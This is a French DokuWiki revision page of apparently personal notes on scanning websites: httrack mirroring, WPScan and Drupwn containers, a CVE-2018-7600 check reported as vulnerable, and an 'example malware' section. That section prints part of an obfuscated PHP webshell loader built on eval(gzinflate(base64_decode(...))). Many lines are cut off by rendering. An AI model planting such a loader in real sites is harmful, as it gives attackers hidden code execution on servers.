tech:scan_site_web
Différences
Ci-dessous, les différences entre deux révisions de la page.
| Les deux révisions précédentesRévision précédenteProchaine révision | Révision précédente | ||
| tech:scan_site_web [2025/05/27 09:58] – Jean-Baptiste | tech:scan_site_web [2026/06/07 19:12] (Version actuelle) – modification externe 127.0.0.1 | ||
|---|---|---|---|
| Ligne 1: | Ligne 1: | ||
| + | < | ||
| + | {{tag> | ||
| + | |||
| + | # Scan site Web | ||
| + | |||
| + | Voir aussi : | ||
| + | * https:// | ||
| + | |||
| + | |||
| + | httrack - Télécharger tous les fichiers .js | ||
| + | ~~~bash | ||
| + | httrack -* +mime: | ||
| + | #httrack --mirror https:// | ||
| + | ~~~ | ||
| + | |||
| + | ~~~bash | ||
| + | pip install pyFreenet3 --use-pep517 | ||
| + | ./ | ||
| + | ~~~ | ||
| + | |||
| + | Voir | ||
| + | https:// | ||
| + | |||
| + | ## Scan en ligne | ||
| + | |||
| + | Voir : | ||
| + | https:// | ||
| + | |||
| + | |||
| + | Liste de scanners : | ||
| + | * https:// | ||
| + | * https:// | ||
| + | * https:// | ||
| + | * https:// | ||
| + | * https:// | ||
| + | * https:// | ||
| + | |||
| + | |||
| + | ### Scan Wordpress | ||
| + | |||
| + | https:// | ||
| + | ~~~bash | ||
| + | docker run -it --rm wpscanteam/ | ||
| + | ~~~ | ||
| + | |||
| + | |||
| + | ### Scan Drupal | ||
| + | |||
| + | ~~~bash | ||
| + | #git clone https:// | ||
| + | #pip install --user -r requirements.txt | ||
| + | docker run --rm -it immunit/ | ||
| + | ~~~ | ||
| + | |||
| + | ~~~ | ||
| + | Drupwn> check CVE-2018-7600 | ||
| + | |||
| + | [+] Application vulnerable | ||
| + | ~~~ | ||
| + | |||
| + | |||
| + | ## Exemple de malware | ||
| + | |||
| + | ~~~ | ||
| + | stat m7hw6o0xhn.php | ||
| + | File: ' | ||
| + | Size: 1797 Blocks: 8 IO Block: 4096 | ||
| + | Device: fc07h/ | ||
| + | Access: (0644/ | ||
| + | Access: 2019-02-08 15: | ||
| + | Modify: 2018-03-27 10: | ||
| + | Change: 2018-05-22 18: | ||
| + | | ||
| + | ~~~ | ||
| + | |||
| + | `/ | ||
| + | ~~~php | ||
| + | <?php | ||
| + | |||
| + | eval(" | ||
| + | |||
| + | $a = " | ||
| + | $a = str_replace($dgreusdi, | ||
| + | eval (gzinflate(base64_decode($a))); | ||
| + | ~~~ | ||
| + | |||
| + | |||
| + | |||
| + | |||
| + | |||
